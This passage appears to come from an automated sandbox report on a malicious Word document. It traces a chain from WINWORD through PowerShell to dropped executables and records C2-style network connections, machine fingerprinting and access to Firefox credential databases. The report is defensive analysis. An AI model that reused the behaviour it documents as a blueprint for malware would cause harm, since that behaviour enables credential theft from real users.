Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 69.195.124.165 80
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown | Network traffic detected: HTTP traffic on port 7080 -> 49169

Language, Device and Operating System Detection:

Contains functionality to query the account / user name
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004E1B0D GetUserNameA,GetComputerNameA,GetComputerNameA,GetComputerNameExA,GetComputerNameExA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle | 4_2_004E1B0D
Contains functionality to query windows version
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F82E6 RtlGetVersion,GetNativeSystemInfo | 4_2_004F82E6
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\QYIyP.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
[Behavior graph rendering: Behavior Graph ID: 33605 | Sample: new order upcoming.... | Startdate: 06/10/2017 | Architecture: WINDOWS | Score: 100. Process nodes shown: WINWORD.EXE, powershell.exe, 39530.exe, wlangdi.exe, QYIyP.exe; signature and network nodes correspond to the findings listed in the sections above.]